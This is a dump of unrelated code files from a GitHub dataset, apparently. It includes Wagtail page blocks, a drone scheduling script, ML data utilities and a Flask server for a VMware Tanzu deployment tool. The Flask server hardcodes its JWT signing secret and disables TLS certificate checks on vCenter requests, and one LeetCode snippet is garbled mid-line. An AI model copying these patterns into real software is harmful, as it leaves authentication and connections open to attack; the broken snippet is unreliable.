Meta:\n template = 'blocks/image_block.html'\n label = \"Image\"\n icon = 'image'\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n if value.get('alignment') == 'center':\n context.update({\n 'classes': 'img-fluid mx-auto d-block',\n })\n else:\n context.update({\n 'classes': 'img-fluid float-{}'.format(value),\n })\n return context\n\n\nclass SpacerBlock(StructBlock):\n space = ChoiceBlock(choices=[(0, '0'), (1, '16px'), (2, '32px'), (3, '48px'), (4, '64px')], default=1)\n space_mobile = ChoiceBlock(choices=[(0, '0'), (1, '16px'), (2, '32px'), (3, '48px'), (4, '64px')], default=0)\n\n class Meta:\n icon = \"fa-arrows-v\"\n template = \"blocks/spacer_block.html\"\n\n\nclass SimpleCard(StructBlock):\n background = ColourThemeChoiceBlock(\n default='bg-transparent',\n label=\"Card Background Colour\"\n ) \n text = RichTextBlock(\n label=\"Card Body Text\",\n help_text=\"Body text for this card.\",\n )\n\n class Meta:\n template = 'blocks/simple_card_block.html'\n label = \"Simple Card (Text Only)\"\n icon = 'form'\n\nclass LinkTargetBlock(StreamBlock):\n \"\"\"\n The target of a link, used by `LinkBlock`.\n \"\"\"\n\n page = PageChooserBlock(\n label=_(\"Page\"), icon='doc-empty-inverse'\n )\n document = DocumentChooserBlock(label=_(\"Document\"), icon='doc-full')\n image = ImageChooserBlock(label=_(\"Image\"))\n url = URLBlock(label=_(\"External link\"))\n anchor = CharBlock(\n label=_(\"Anchor link\"),\n help_text=mark_safe(\n _(\n \"An anchor in the current page, for example: \"\n \"#target-id.\"\n )\n ),\n 
)\n\n def set_name(self, name):\n # Do not generate a label from the name as Block.set_name does\n self.name = name\n\n class Meta:\n icon = 'link'\n max_num = 1\n form_classname = 'link-target-block'\n\n\nclass LinkValue(StructValue):\n def href(self):\n \"\"\"Return the URL of the chosen target or `None` if it is undefined.\"\"\"\n try:\n child_value = self['target'][0].value\n except (IndexError, KeyError):\n return None\n if hasattr(child_value, 'file') and hasattr(child_value.file, 'url'):\n href = child_value.file.url\n elif hasattr(child_value, 'url'):\n href = child_value.url\n else:\n href = child_value\n return href\n\n\nclass LinkBlock(StructBlock):\n \"\"\"\n A link with a target chosen from a range of types - i.e. a page, an URL.\n \"\"\"\n\n class Meta:\n icon = 'link'\n label = _(\"Link\")\n value_class = LinkValue\n form_classname = 'link-block'\n form_template = 'pages/block_forms/link_block.html'\n\n def __init__(self, *args, required=True, **kwargs):\n super().__init__(*args, required=required, **kwargs)\n\n target = LinkTargetBlock(required=required)\n target.set_name('target')\n\n self.child_blocks['target'] = target\n\n @property\n def required(self):\n return self.meta.required\n\n\nclass ButtonBlock(StructBlock):\n \"\"\"\n A button which acts like a link.\n \"\"\"\n\n text = CharBlock(label=_(\"Text\"))\n link = LinkBlock()\n\n class Meta:\n icon = 'link'\n label = _(\"Button\")\n template = 'blocks/button_block.html'\n\n\nclass HorizontalRuleBlock(StructBlock):\n class Meta:\n icon = 'horizontalrule'\n label = _(\"Horizontal Rule\")\n template = 'blocks/hr_block.html'\n\n\nclass CarouselItemBlock(StructBlock):\n image = _ImageChooserBlock()\n caption = _RichTextBlock()\n\n\nclass CarouselBlock(StructBlock):\n items = ListBlock(CarouselItemBlock())\n\n class Meta:\n icon = 'image'\n label = _('Image carousel')\n template = 'blocks/carousel_block.html'\n\n \n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n context['uuid'] = uuid.uuid4()\n return context\n\n \n\n\n\n\nclass CommonBlocks(StreamBlock):\n # heading = HeadingBlock(group=\"Common\")\n text = RichTextBlock(group=\"Common\")\n # text_collapse = TextCollapse(group=\"Common\")\n image = ImageChooserBlock(group=\"Common\")\n button = ButtonBlock(group=\"Common\")\n # round_image = RoundImageChooserBlock(group=\"Common\")\n video = EmbedBlock(group=\"Common\")\n html = RawHTMLBlock(group=\"Common\")\n space = SpacerBlock(group=\"Common\")\n card = SimpleCard(group=\"Common\")\n hr = HorizontalRuleBlock(group=\"Common\")\n carousel = CarouselBlock(group=\"Common\")\n # accordion = AccordionBlock(child_block=AccordionElement(), group=\"Common\")\n # tile = TileBlock(group=\"Common\")\n\nclass BaseColumnTwo(StructBlock):\n left = CommonBlocks(required=False)\n right = CommonBlocks(required=False)\n\n class Meta:\n icon = \"table\"\n\n\nclass Column11(BaseColumnTwo):\n\n class Meta:\n template = 'blocks/column11_block.html'\n label = \"Column (1|1)\"\n\n\nclass Column21(BaseColumnTwo):\n\n class Meta:\n template = 'blocks/column21_block.html'\n label = \"Column (2|1)\"\n\n\nclass Column12(BaseColumnTwo):\n\n class Meta:\n template = 'blocks/column12_block.html'\n label = \"Column (1|2)\"\n\n\nclass Column111(StructBlock):\n left = CommonBlocks(required=False)\n middle = CommonBlocks(required=False)\n right = CommonBlocks(required=False)\n\n class Meta:\n template = 'blocks/column111_block.html'\n icon = \"table\"\n label = \"Column (1|1|1)\"\n\n\nclass 
ColumnBlocks(StreamBlock):\n column11 = Column11(group=\"Columns\")\n column111 = Column111(group=\"Columns\")\n column12 = Column12(group=\"Columns\")\n column21 = Column21(group=\"Columns\")\n\n\nclass ProductionDaysBlock(StructBlock):\n production_day_limit = IntegerBlock(default=4, required=False)\n\n class Meta:\n template = 'blocks/production_days_block.html'\n label = _('Production Days')\n icon = 'date'\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n if parent_context and 'request' in parent_context:\n production_days = ProductionDay.objects.published().upcoming().available_to_user(parent_context['request'].user)\n else:\n production_days = ProductionDay.objects.published().upcoming().available()\n if parent_context and 'production_day_next' in parent_context:\n production_days = production_days.exclude(id=parent_context['production_day_next'].pk)\n if value.get('production_day_limit'):\n production_days = production_days[:value.get('production_day_limit')]\n context['production_days'] = production_days\n return context\n \n\nclass ProductAssortmentBlock(StructBlock):\n only_planned_products = BooleanBlock(default=True, required=False)\n\n class Meta:\n template = 'blocks/product_assortment_block.html'\n label = _('Product Assortment')\n icon = 'list-ul'\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context)\n products = Product.objects.filter(is_sellable=True)\n if value.get('only_planned_products'):\n today = datetime.now().date()\n products = products.filter(production_days__production_day__day_of_sale__gte=today)\n context['products'] = products.distinct().order_by('category')\n return context\n\n\nclass BakeupBlocks(StreamBlock):\n production_days = ProductionDaysBlock(group=\"Bakeup\")\n product_assortment = ProductAssortmentBlock(group=\"Bakeup\")\n\n\nclass ContentBlocks(CommonBlocks, ColumnBlocks):\n pass\n\nclass AllBlocks(BakeupBlocks, CommonBlocks, ColumnBlocks):\n pass","repo_name":"bruecksen/bakeup","sub_path":"bakeup/pages/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":9968,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"16966587799","text":"#!/Users/sandeepbalaji/anaconda3/bin/python\nimport re, math, sys, os\nfrom datetime import datetime, timedelta\n\ninput_file = sys.argv[1]\noutput_file = os.path.dirname(sys.argv[1])+\"/output.txt\"\nprint(output_file)\n\n#Calculate ratings for the hours\n# 1 -> promoters\n# 0 -> neutral\n# -1 -> detractors\ndef ratings(hours):\n if int(hours) <= 1:\n return 1\n elif int(hours) > 7:\n return -1\n else:\n return 0\n\n#read the input file and return them as list of tuples\ndef read_input(filename):\n data =[]\n file = open(filename, \"r\")\n for line in file:\n data.append(tuple(line.split()))\n file.close()\n return data\n\n#calculate the distance required for the order\ndef calc_distance(coordinate):\n x, y = re.split(r'\\D',coordinate)[1:]\n sum = math.sqrt(int(x)**2 + int(y)**2)\n return 2*sum\n\n#calculate the hours for the order\ndef calc_hours(start_time, order_time, distance):\n minutes = (start_time - order_time).seconds/60 + distance\n return minutes/60\n\n#calculate the nps score for all the scheduled orders\ndef calc_nps(out, inp):\n promoters = 0\n detractors = 0\n assert len(inp) == len(out)\n for i in range(len(inp)):\n distance = calc_distance(inp[i][1])\n order_time = datetime.strptime(inp[i][2], '%H:%M:%S')\n 
start_time = datetime.strptime(out[i][1], '%H:%M:%S')\n hours = calc_hours(start_time, order_time, distance)\n if ratings(hours) == 1:\n promoters += 1\n elif ratings(hours) == -1:\n detractors += 1\n return round((promoters-detractors)/len(inp)*100)\n\n#function for filtering orders which are less than the current time\ndef filter_data(data, current_time):\n list = []\n for i in range(len(data)):\n if datetime.strptime(data[i][2], '%H:%M:%S') < current_time:\n list.append(data[i])\n else:\n break\n return list\n\n#main function\nif __name__ == '__main__':\n out = []\n data = read_input(input_file)\n inp = data.copy()\n data_set = set(data)\n current_time = datetime.strptime('06:00:00', '%H:%M:%S') #start at 6am\n filtered = filter_data(data, current_time)\n fulfilled = set()\n output = open(output_file, \"wt\")\n date_check = datetime.strptime('22:00:00', '%H:%M:%S') #variable to check for 10pm\n while fulfilled.symmetric_difference(data_set) != set(): #loop until all the orders are scheduled\n best_hours = float('inf')\n ind = -1\n for i in range(len(filtered)):\n distance = calc_distance(filtered[i][1])\n hours = calc_hours(current_time, datetime.strptime(filtered[i][2], '%H:%M:%S'), distance/2)\n if best_hours > hours: #get the order with least cost(distance + time elapsed)\n best_hours = hours\n ind = i\n\n if current_time > date_check: #if time crosses 10pm, push to next day 6pm\n current_time = datetime.strptime('22:00:00', '%H:%M:%S')+timedelta(hours=8)\n date_check += timedelta(days=1)\n distance = calc_distance(filtered[ind][1])\n hours = calc_hours(current_time, datetime.strptime(filtered[ind][2], '%H:%M:%S'), distance/2)\n out.append(tuple([filtered[ind][0], current_time.time().strftime('%H:%M:%S')]))\n output.write(filtered[ind][0]+\" \" +current_time.time().strftime('%H:%M:%S') +\"\\n\")\n fulfilled.add(filtered[ind])\n data.remove(filtered[ind])\n current_time += timedelta(seconds=60*distance)\n filtered = filter_data(data, current_time)\n if filtered == [] and data != []:#pick the next least order, if no orders to schedule\n current_time = datetime.strptime(data[0][2], '%H:%M:%S')\n filtered = filter_data(data, current_time)\n\n nps = calc_nps(out, inp)\n output.write(\"NPS \"+str(nps))\n output.close()\n","repo_name":"cbsandeep10/drone-schedule-challenge","sub_path":"drone_schedule.py","file_name":"drone_schedule.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8070472748","text":"class Solution(object):\n def getAverages(self, nums, k):\n dictMap = {\n }\n if len(nums)=0 and next_pointer None:\n\n \"\"\"Calculate the frequency per cell for all gene types in the previously created masks.\"\"\"\n\n for col_name, new_col_name in zip(g_fct.df_col_names(c['all_tissue_mask_names_calc'], c['units'][0]),\n g_fct.df_col_names(c['all_tissue_mask_names_calc'], c['units'][1])):\n\n df_counts[new_col_name] = df_counts[col_name] / df_counts.loc['cells', col_name]\n\n#################################\n","repo_name":"spatialhisto/GTC","sub_path":"gtc/calc/gtc_calc__calc_counts_per_cell.py","file_name":"gtc_calc__calc_counts_per_cell.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7794637368","text":"from sentence_transformers.readers import InputExample\r\nimport csv\r\nimport gzip\r\nimport os\r\n\r\n\r\nclass LabelSentenceReader:\r\n \"\"\"Reads in a file that has at least 
two columns: a label and a sentence.\r\n This reader can for example be used with the BatchHardTripletLoss.\r\n Maps labels automatically to integers\"\"\"\r\n\r\n def __init__(self, folder, label_col_idx=0, sentence_col_idx=1, separator='\\t', aug_method='eda'):\r\n self.folder = folder\r\n self.label_map = {}\r\n self.label_col_idx = label_col_idx\r\n self.sentence_col_idx = sentence_col_idx\r\n self.separator = separator\r\n self.aug_method = aug_method\r\n\r\n def get_examples(self, filename, max_examples=0):\r\n examples = []\r\n labels = []\r\n id = 0\r\n for line in open(os.path.join(self.folder, filename), encoding=\"utf-8\"):\r\n splits = line.strip().split(self.separator)\r\n label = splits[self.label_col_idx]\r\n sentence = splits[self.sentence_col_idx]\r\n\r\n if self.aug_method in ['eda']:\r\n context_aug_sentence = splits[2]\r\n random_aug_sentence = splits[3]\r\n back_translation_aug = splits[4]\r\n texts = [sentence, context_aug_sentence, random_aug_sentence, back_translation_aug]\r\n elif self.aug_method in ['dropout']:\r\n texts = [sentence, sentence]\r\n elif self.aug_method in ['mix']:\r\n back_translation_aug = splits[4]\r\n texts = [sentence, sentence, back_translation_aug, back_translation_aug]\r\n elif self.aug_method in ['bt']:\r\n back_translation_aug = splits[4]\r\n texts = [sentence, back_translation_aug]\r\n elif self.aug_method in ['none']:\r\n texts = [sentence]\r\n else:\r\n texts = []\r\n\r\n if label not in self.label_map:\r\n self.label_map[label] = len(self.label_map)\r\n\r\n label_id = self.label_map[label]\r\n guid = \"%s-%d\" % (filename, id)\r\n id += 1\r\n examples.append(InputExample(guid=guid, texts=texts, label=label_id))\r\n\r\n if 0 < max_examples <= id:\r\n break\r\n\r\n labels.append(label_id)\r\n\r\n return examples, labels\r\n","repo_name":"bbsngg/STAM","sub_path":"src/utils/LabelSentenceReader.py","file_name":"LabelSentenceReader.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72728332714","text":"# -*-coding:utf-8 -*\n\n# Player data\nplayer_name = \"\"\nplayer_attempt = \"\"\nplayer_score = 0\n\n# Word data\nrandom_word = \"\"\nhidden_word = \"\"\nwords = []\n\n# File data\nscores = {}\nfilepath = {\n \"dictionary\": \"..\\media\\dictionary.txt\",\n \"scores\": \"scores\",\n}\n\n# Counter\nscore_counter = 8","repo_name":"dalyl-zero/Hangman","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9045562688","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 15:46:45 2022\n\n@author: rosskearney\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.linear_model import LogisticRegression\n\n# =============================================================================\n# IMPORT DATA\n# =============================================================================\n\ndf = pd.read_csv('/Users/rosskearney/Desktop/Machine Learning/GroupProject/European_bank_marketing.csv')\n\n# =============================================================================\n# CREATE DUMMY VARIABLES TO DEAL WITH CATAGORICAL VARIABLES\n# 
=============================================================================\n\ndummydf = pd.get_dummies(df)\n\n# =============================================================================\n# SET DEPENDENT VARIABLE 'term_deposit'\n# =============================================================================\n\ny = dummydf['term_deposit']\nx = dummydf.drop('term_deposit', axis=1)\nx = x.drop('duration', axis=1)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=0)\n\ncolumns = x_train.columns\n\n# =============================================================================\n# OVERSAMPLING WITH SMOTE\n# =============================================================================\n\nsmote = SMOTE(random_state=0)\n\n\nos_data_X, os_data_y = smote.fit_resample(x_train, y_train)\nos_data_X = pd.DataFrame(data=os_data_X, columns=columns)\nos_data_y = pd.DataFrame(data=os_data_y, columns=['term_deposit'])\n\n# check the class balance of the oversampled data\nprint(\"length of oversampled data is \",len(os_data_X))\nprint(\"Number of no subscription in oversampled data\",len(os_data_y[os_data_y['term_deposit']==0]))\nprint(\"Number of subscription\",len(os_data_y[os_data_y['term_deposit']==1]))\nprint(\"Proportion of no subscription data in oversampled data is \",len(os_data_y[os_data_y['term_deposit']==0])/len(os_data_X))\nprint(\"Proportion of subscription data in oversampled data is \",len(os_data_y[os_data_y['term_deposit']==1])/len(os_data_X))\n\n\n# =============================================================================\n# FIT MODEL AND PRINT RESULTS\n# =============================================================================\n\nX=os_data_X\ny=os_data_y\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\nlogreg = LogisticRegression(max_iter=10000)\nlogreg.fit(X_train, y_train)\n\ny_pred = logreg.predict(X_test)\nprint('Accuracy of logistic regression classifier on test set: {:.3f}'.format(logreg.score(X_test, y_test)))\n\n\ncm = confusion_matrix(y_test, y_pred)\nprint(cm)\n","repo_name":"Rosskearney/Machine-Learning","sub_path":"Q4b.py","file_name":"Q4b.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16465766379","text":"from collections import ChainMap\nimport builtins\nimport os, argparse\nprint('-' * 80)\na = {'Kotlin':90,'Python':86}\nb = {'Go':93,'Python':92}\nc = {'Swift':89,'Go':87}\ncm = ChainMap(a,b,c)\nprint('ChainMap : ', cm)\nprint('Python : ', cm['Python'])\nprint('Go : ', cm['Go'])\nprint('-' * 80)\nmy_name = 'Harry'\ndef test():\n    my_name = 'Jack'\n    pylookup = ChainMap(locals(), globals(), vars(builtins))\n    print(pylookup['my_name'])\n    print(pylookup['len'])\ntest()\nprint('-' * 80)\ndefaults = {'color':'Blue','user':'Harry'}\nparser = argparse.ArgumentParser()\nparser.add_argument('-u','--user')\nparser.add_argument('-c','--color')\nnamespace = parser.parse_args()\ncommand_line_args = {k:v for k,v in vars(namespace).items() if v}\ncombined = ChainMap(command_line_args, os.environ, defaults)\nprint(combined['color'])\nprint(combined['user'])\nprint('-' * 80)","repo_name":"ItManHarry/Python","sub_path":"PythonCSDN/code/book/chapter10/code-chainmap.py","file_name":"code-chainmap.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27390162944","text":"import datetime\nimport json\nimport 
logging\nimport os\nimport sys\nimport uuid\nfrom http import HTTPStatus\nfrom logging.config import fileConfig\nfrom logging.handlers import RotatingFileHandler\nfrom os.path import basename\nfrom pathlib import Path\nfrom zipfile import ZipFile\n\nimport jwt\nimport requests\nfrom flask import Flask, jsonify, send_file, session\nfrom flask_cors import CORS\nfrom flask_injector import FlaskInjector, inject, singleton\nfrom flask_restful import Api, request\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom common.cleanup.cleanup import cleanup_env\nfrom common.deployApp.deployApp import deploy_app\nfrom common.harbor.push_tkg_image_to_harbor import harbor\nfrom common.login_auth.authentication import token_required\nfrom common.login_auth.users import Users, db\nfrom common.operation.constants import Paths, SivtStatus\nfrom common.operation.ShellHelper import runShellCommandAndReturnOutputAsList\nfrom common.prechecks.list_reources import vcenter_resources\nfrom common.prechecks.precheck import vcenter_precheck\nfrom common.session.session_acquire import session_acquire\nfrom common.tkg.extension.deploy_ext import tkg_extensions\nfrom common.util.common_utils import CommonUtils\nfrom common.util.deployment_status_util import deploy_status\nfrom common.util.log_streaming_util import log_stream\nfrom common.util.request_api_util import RequestApiUtil\nfrom common.util.tiny_db_util import TinyDbUtil\nfrom common.wcp_shutdown.wcp_shutdown import shutdown_env\nfrom vcd.vcd_prechecks.vcd_ui_utils import vcd_ui_util\nfrom vcd.vcd_prechecks.vcdPrechecks import vcd_precheck\nfrom vmc.aviConfig.avi_config import avi_config, configure_alb\nfrom vmc.managementConfig.management_config import configManagementCluster, management_config\nfrom vmc.sharedConfig.shared_config import configSharedCluster, shared_config\nfrom vmc.vmcConfig.vmc_config import config_vmc_env, vmc_config\nfrom vmc.workloadConfig.workload_config import workload_config, workloadConfig\nfrom vsphere.aviConfig.vsphere_avi_config import vcenter_avi_config\nfrom vsphere.managementConfig.vsphere_management_config import vsphere_management_config\nfrom vsphere.managementConfig.vsphere_tkgs_supervisor_config import vsphere_supervisor_cluster\nfrom vsphere.sharedConfig.vsphere_shared_config import vsphere_shared_config\nfrom vsphere.vcfConfig.vcf_config import vcf_config\nfrom vsphere.workloadConfig.vsphere_tkgs_workload import vsphere_tkgs_workload_cluster\nfrom vsphere.workloadConfig.vsphere_workload_config import vsphere_workload_config\n\nfileConfig(Path(\"logging.conf\"))\nlogger = logging.getLogger(__name__)\nlogging.config.fileConfig(\"logging.conf\")\n\nPath(\"/var/log/server/\").mkdir(parents=True, exist_ok=True)\n\nlogger.setLevel(logging.DEBUG)\nLOG_FILENAME = \"/var/log/server/arcas.log\"\nformatter = logging.Formatter(\"%(asctime)-16s %(levelname)-8s %(filename)-s:%(lineno)-3s %(message)s\")\n\nhandler = RotatingFileHandler(LOG_FILENAME, maxBytes=5242880, backupCount=10)\nhandler.setFormatter(formatter)\nhandler.setLevel(logging.DEBUG)\n\nstdout_handler = logging.StreamHandler(sys.stdout)\nstdout_handler.setFormatter(formatter)\nstdout_handler.setLevel(logging.INFO)\n\napp = Flask(__name__)\napi = Api(app)\nCORS(app, supports_credentials=True)\napp.config[\"SECRET_KEY\"] = \"004f2af45d3a4e161a7dd2d17fdae47f\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite://///opt/vmware/arcas/src/sivt.db\"\napp.config[\"PERMANENT_SESSION_LIFETIME\"] = 
datetime.timedelta(minutes=235)\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\ndb.init_app(app)\n\n\n@app.before_first_request\ndef create_tables():\n db.create_all()\n\n\n# swagger specific ###\nSWAGGER_URL = \"/swagger\"\nSWAGGER_BLUEPRINT = get_swaggerui_blueprint(\n SWAGGER_URL,\n api_url=None,\n config={\n \"app_name\": \"arcas\",\n \"layout\": \"StandaloneLayout\",\n \"plugins\": [\"TopBar\"],\n \"urls\": [\n {\"url\": \"/static/vsphere.json\", \"name\": \"vsphere\", \"primaryName\": \"vsphere\"},\n {\"url\": \"/static/vmc.json\", \"name\": \"vmc\", \"primaryName\": \"vmc\"},\n {\"url\": \"/static/vcf.json\", \"name\": \"vcf\", \"primaryName\": \"vcf\"},\n ],\n },\n blueprint_name=\"arcas\",\n)\n\napp.register_blueprint(SWAGGER_BLUEPRINT, url_prefix=SWAGGER_URL)\n# end swagger specific ###\n\napp.logger.addHandler(handler)\napp.logger.addHandler(stdout_handler)\napp.register_blueprint(shared_config, url_prefix=\"\")\napp.register_blueprint(vmc_config, url_prefix=\"\")\napp.register_blueprint(vcf_config, url_prefix=\"\")\napp.register_blueprint(avi_config, url_prefix=\"\")\napp.register_blueprint(workload_config, url_prefix=\"\")\napp.register_blueprint(deploy_app, url_prefix=\"\")\napp.register_blueprint(management_config, url_prefix=\"\")\napp.register_blueprint(session_acquire, url_prefix=\"\")\napp.register_blueprint(vcenter_avi_config, url_prefix=\"\")\n\napp.register_blueprint(vsphere_management_config, url_prefix=\"\")\napp.register_blueprint(vsphere_shared_config, url_prefix=\"\")\napp.register_blueprint(vsphere_workload_config, url_prefix=\"\")\napp.register_blueprint(vcenter_precheck, url_prefix=\"\")\napp.register_blueprint(vcenter_resources, url_prefix=\"\")\napp.register_blueprint(tkg_extensions, url_prefix=\"\")\napp.register_blueprint(cleanup_env, url_prefix=\"\")\napp.register_blueprint(harbor, url_prefix=\"\")\napp.register_blueprint(shutdown_env, url_prefix=\"\")\napp.register_blueprint(vcd_precheck, url_prefix=\"\")\napp.register_blueprint(vcd_ui_util, url_prefix=\"\")\napp.register_blueprint(vsphere_tkgs_workload_cluster, url_prefix=\"\")\napp.register_blueprint(vsphere_supervisor_cluster, url_prefix=\"\")\napp.register_blueprint(deploy_status, url_prefix=\"\")\napp.register_blueprint(log_stream, url_prefix=\"\")\n\n\ndef configure(binder):\n # incase of server restart all the in-progress(halted) jobs needs to be error.\n db_file = Paths.SIVT_DB_FILE\n db_object = TinyDbUtil(Paths.SIVT_DB_FILE)\n if CommonUtils.is_file_exist(db_file):\n db_object.update_in_progress_to_error()\n binder.bind(TinyDbUtil, to=db_object, scope=singleton)\n\n\n@app.before_request\n@inject\ndef before_request_func(tiny_db_util: TinyDbUtil):\n env = request.headers.get(\"Env\")\n json_data = \"\"\n # fetch json data from endpoint body\n if len(request.data) > 0:\n json_data = request.get_json(force=True)\n # update db, in case new request and db json not exist\n tiny_db_util.check_db_file(env=env, json_file=json_data)\n # update db with in-progress status\n endpoint_path = request.path\n component = CommonUtils.match_endpoint(endpoint_path)\n if component:\n tiny_db_util.update_db_file(SivtStatus.IN_PROGRESS, component)\n\n\n@app.after_request\n@inject\ndef after_request_func(response, tiny_db_util: TinyDbUtil):\n # update db with deployment job status\n endpoint_path = request.path\n component = CommonUtils.match_endpoint(endpoint_path)\n if component:\n if response.status_code == HTTPStatus.OK:\n tiny_db_util.update_db_file(SivtStatus.SUCCESS, component)\n else:\n 
tiny_db_util.update_db_file(SivtStatus.FAILED, component)\n return response\n\n\n@app.route(\"/api/tanzu/vmc/tkgm\", methods=[\"POST\"])\n@token_required\ndef configTkgm(current_user):\n vmc = config_vmc_env()\n if vmc[1] != 200:\n app.logger.error(vmc[0].json[\"msg\"])\n d = {\"responseType\": \"ERROR\", \"msg\": vmc[0].json[\"msg\"], \"STATUS_CODE\": 500}\n return jsonify(d), 500\n avi = configure_alb()\n if vmc[1] != 200:\n app.logger.error(str(avi[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(avi[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n mgmt = configManagementCluster()\n if mgmt[1] != 200:\n app.logger.error(str(mgmt[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(mgmt[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n shared = configSharedCluster()\n if shared[1] != 200:\n app.logger.error(str(shared[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(shared[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n workLoad = workloadConfig()\n if workLoad[1] != 200:\n app.logger.error(str(workLoad[0].json[\"msg\"]))\n d = {\"responseType\": \"ERROR\", \"msg\": str(workLoad[0].json[\"msg\"]), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n d = {\"responseType\": \"SUCCESS\", \"msg\": \"Tkgm configured Successfully \", \"STATUS_CODE\": 200}\n app.logger.info(\"Tkgm configured Successfully \")\n return jsonify(d), 200\n\n\n@app.route(\"/api/tanzu/login\", methods=[\"POST\"])\ndef login_user():\n auth = request.authorization\n try:\n server = request.headers[\"Server\"]\n except Exception:\n app.logger.error(\"vCenter Server is not passed as header\")\n response = RequestApiUtil.create_json_object(\n \"vCenter Server is not passed as header\", response_type=\"ERROR\", status_code=HTTPStatus.UNAUTHORIZED\n )\n return response, HTTPStatus.UNAUTHORIZED\n\n if not auth or not auth.username or not auth.password:\n app.logger.error(\"Username and Password not passed.\")\n response = RequestApiUtil.create_json_object(\n \"Username and Password not passed\", response_type=\"ERROR\", status_code=HTTPStatus.UNAUTHORIZED\n )\n return response\n sess = requests.post(\n \"https://\" + str(server) + \"/rest/com/vmware/cis/session\", auth=(auth.username, auth.password), verify=False\n )\n if sess.status_code != 200:\n app.logger.error(\"Connection to vCenter failed, incorrect user name or password\")\n response = RequestApiUtil.create_json_object(\n \"Connection to vCenter failed, incorrect user name or password\",\n response_type=\"ERROR\",\n status_code=HTTPStatus.UNAUTHORIZED,\n )\n return response, HTTPStatus.UNAUTHORIZED\n execute = False\n try:\n user = Users.query.filter_by(name=auth.username).first()\n if user is None:\n execute = True\n except Exception:\n execute = True\n if execute:\n hashed_password = generate_password_hash(auth.password, method=\"sha256\")\n new_user = Users(public_id=str(uuid.uuid4()), name=auth.username, password=hashed_password, admin=False)\n db.session.add(new_user)\n db.session.commit()\n user = Users.query.filter_by(name=auth.username).first()\n if check_password_hash(user.password, auth.password):\n app.logger.info(\"Generated token successfully\")\n token = jwt.encode(\n {\"public_id\": user.public_id, \"exp\": datetime.datetime.utcnow() + datetime.timedelta(minutes=240)},\n app.config[\"SECRET_KEY\"],\n \"HS256\",\n )\n session[\"username\"] = auth.username\n app.logger.info(\"Login successful\")\n response = RequestApiUtil.create_json_object(\n 
\"Successfully fetched session token\",\n response_type=\"SUCCESS\",\n status_code=HTTPStatus.UNAUTHORIZED,\n add_data={\"token\": token},\n )\n return response, HTTPStatus.OK\n\n app.logger.error(\"Could not verify, login required\")\n response = RequestApiUtil.create_json_object(\n \"Could not verify, login required\", response_type=\"ERROR\", status_code=HTTPStatus.UNAUTHORIZED\n )\n return response, HTTPStatus.UNAUTHORIZED\n\n\n@app.route(\"/api/tanzu/active_session\", methods=[\"GET\"])\ndef check_active_session():\n user = session.get(\"username\")\n if user is None:\n is_active = False\n else:\n is_active = True\n app.logger.info(\"******\")\n app.logger.info(user)\n if is_active:\n app.logger.info(\"You are already logged in as: \" + user)\n response = RequestApiUtil.create_json_object(\n \"You are already logged in as: \" + user,\n status_code=HTTPStatus.OK,\n add_data={\"SESSION\": \"ACTIVE\", \"USER\": user},\n )\n return response, HTTPStatus.OK\n else:\n app.logger.info(\"Session not active\")\n response = RequestApiUtil.create_json_object(\n \"Session not active\",\n response_type=\"ERROR\",\n status_code=HTTPStatus.UNAUTHORIZED,\n )\n return response, HTTPStatus.UNAUTHORIZED\n\n\n@app.route(\"/api/tanzu/logout\", methods=[\"GET\"])\ndef logout():\n user = session.get(\"username\")\n if user is None:\n is_active = False\n else:\n is_active = True\n if is_active:\n session.pop(\"username\", None)\n app.logger.info(\"User successfully logged out\")\n response = RequestApiUtil.create_json_object(\"User successfully logged out\", status_code=HTTPStatus.OK)\n return response, HTTPStatus.OK\n else:\n app.logger.info(\"No active session found\")\n response = RequestApiUtil.create_json_object(\"No active session found\", status_code=HTTPStatus.OK)\n return response, HTTPStatus.OK\n\n\n@app.route(\"/api/tanzu/createinputfile\", methods=[\"POST\"])\n@token_required\ndef createInputFile(current_user):\n user = current_user.name\n home_dir = os.path.join(\"/home\", user)\n try:\n filename = home_dir + \"/\" + request.headers[\"filename\"]\n if not os.path.exists(home_dir):\n os.makedirs(home_dir)\n except Exception:\n 